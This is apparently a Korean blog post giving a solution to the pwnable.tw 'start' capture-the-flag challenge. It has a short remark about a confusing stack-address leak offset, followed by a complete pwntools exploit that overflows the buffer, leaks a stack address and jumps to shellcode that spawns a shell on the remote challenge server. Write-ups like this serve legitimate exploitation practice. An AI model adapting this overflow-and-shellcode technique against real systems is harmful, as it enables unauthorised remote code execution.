[pwnable.tw]start

삽질했던게 leak을 할때 세번째 주소를 읽었었는데 스택영역 주소임에도 불구하고 offset이 안맞았다. start의 ret AAAA BBBB CCCC에서 CCCC부분의 주소였는데 aslr이 다르게 적용되는 걸까? 잘 모르겠다 음.. 왜지

from pwn import *
#r=process('./start')
r=remote('chall.pwnable.tw',10000)
payload='A'*20
payload+=p32(0x8048087)
r.recv(1024)
r.send(payload)
leak=u32(r.recv(4))
print hex(leak)
payload = 'A'*20+p32(leak+0x14)+asm(shellcraft.i386.linux.sh())
r.sendline(payload)
r.interactive()